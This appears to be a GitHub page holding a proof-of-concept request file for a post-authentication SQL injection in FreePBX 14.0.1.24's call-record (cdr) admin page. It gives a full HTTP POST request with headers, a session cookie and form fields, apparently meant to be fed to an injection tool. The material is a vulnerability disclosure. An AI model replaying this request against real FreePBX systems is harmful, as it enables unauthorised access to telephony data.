-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathsqlipoc-freepbx-14.0.1.24-req.txt
24 lines (20 loc) · 1.25 KB
/
sqlipoc-freepbx-14.0.1.24-req.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
; Postauth SQLi bug for FreePBX: 14.0.1.24 (SNG7-PBX-64bit-1712-2)
; by code610
c@kali:~$ cat fpbx14.txt
POST /admin/config.php?display=cdr HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,pl;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 480
Referer: http://192.168.1.14/admin/config.php?display=cdr
Cookie: lang=en_US; searchHide=1; PHPSESSID=3oceupnmng8qp42sodd1fc9942; _ga=GA1.1.2114860400.1517389433; _gid=GA1.1.2090265445.1517389433; lang=en_US
Connection: close
Upgrade-Insecure-Requests: 1
order=calldate&startday=01&startmonth=01&startyear=2018&starthour=00&startmin=00&endday=31&endmonth=01&endyear=2018&endhour=23&endmin=59&need_html=true&limit=100&cnum=aaa&cnum_mod=begins_with&cnam=&cnam_mod=begins_with&outbound_cnum=&outbound_cnum_mod=begins_with&did=&did_mod=begins_with&dst=&dst_mod=begins_with&dst_cnam=&dst_cnam_mod=begins_with&userfield=&userfield_mod=begins_with&accountcode=&accountcode_mod=begins_with&dur_min=&dur_max=&disposition=all&sort=DESC&group=day
c@kali:~$
; more: code610 blogspot com
;
; o/